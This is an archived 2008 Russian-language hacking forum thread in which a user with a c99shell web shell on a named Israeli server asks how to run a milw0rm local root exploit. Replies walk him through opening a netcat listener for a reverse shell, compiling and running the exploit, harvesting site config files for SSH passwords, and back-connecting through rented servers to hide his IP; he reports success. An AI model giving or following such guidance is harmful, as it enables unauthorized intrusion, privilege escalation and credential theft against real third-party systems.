PDA

Просмотр полной версии : Nushna Pomash for run exploit

St4s3k
01.01.2008, 14:44
Privet,

u menia yest shell c99shell na takom servere:

Linux server.sharatim.org.il 2.6.18-53.el5 #1 SMP Mon Nov 12 02:14:55 EST 2007 x86_64

tiper mne Run explit shtob tastat root,

mne skazali poprobivat etot explit: http://milw0rm.com/exploits/4460

tiper mne nushna obisnit kak ivo zapustit, gde, 4o i kak?

ia zagruzil file na server tam she gde i shell pot imenem exp.c

a shto teper delat? poshalusta pomogite!!! :rolleyes:
St4s3k
01.01.2008, 18:04
? ?
aka PSIH
01.01.2008, 18:37
Вариант 1:
Пробуй сделать backconnect , c99shell->Tools->Back connection
Сначала запусти у себя на компе NetCat из cmd: nc -l -n -v -p 31373
если backconnet проканает(появиться консоль сервера) делай
# gcc exp.c (или gcc exp.c -o exp непомню :))
# chmod +x exp
# ./exp

Вариант 2:
Если на сервере есть SSH, то ищи через вебшелл разные конфиги сайтов с именами\паролями, и пробуй с ними подлючиться по SSH, если повезет и ты подключишся делай также
# gcc exp.c
# chmod +x exp
# ./exp

вроде так... давно я linux не рутал.... :)
Tw!m4
02.01.2008, 04:19
Privet,

u menia yest shell c99shell na takom servere:

Linux server.sharatim.org.il 2.6.18-53.el5 #1 SMP Mon Nov 12 02:14:55 EST 2007 x86_64

tiper mne Run explit shtob tastat root,

mne skazali poprobivat etot explit: http://milw0rm.com/exploits/4460

tiper mne nushna obisnit kak ivo zapustit, gde, 4o i kak?

ia zagruzil file na server tam she gde i shell pot imenem exp.c

a shto teper delat? poshalusta pomogite!!! :rolleyes:

а шелл сам заливал? оО
ground_zero
02.01.2008, 06:12
да запарили уже новый год с первым апреля путать
St4s3k
02.01.2008, 15:10
а шелл сам заливал? оО

hhh... paniatna 4to zalival, ia tibe na dibila pahosh? hh..
St4s3k
02.01.2008, 15:36
"Сначала запусти у себя на компе NetCat из cmd: nc -l -n -v -p 31373"

zdelal eto, a on mne: "is not recognized as an internal or external command, operable program or batch file".

4o delat?
aka PSIH
02.01.2008, 15:42
:) Пуск->Выполнить->cmd
перейди в папку где у тебя лежит Netcat (nc.exe)
и уже там запускай nc -l -n -v -p 31373
AFoST
02.01.2008, 15:52
Такой вопрос...А это не опасно бекконектиться на свой ип? Палево однако...Может лучше с Putty через сокс?
aka PSIH
02.01.2008, 15:59
Опасно конечно, но кто тебя заставляет на свой ip коннектиться? я допустим всегда на дедик backconnect делал...
AFoST
02.01.2008, 16:04
А..точно. ещё ж дедики есть =)
St4s3k
02.01.2008, 16:14
:) Пуск->Выполнить->cmd
перейди в папку где у тебя лежит Netcat (nc.exe)
и уже там запускай nc -l -n -v -p 31373

palu4ilos on pishit mne: "listening to [any] 31373 ..."


a teper mne vshele kagda "connect" delaiu on pishit:
"Result of back connection:
Can't download sources"
St4s3k
02.01.2008, 16:20
opgromnoie sposibooo!! polu4ilosss!!! sppassibbaa
Tw!m4
03.01.2008, 06:38
hhh... paniatna 4to zalival, ia tibe na dibila pahosh? hh..

не видел....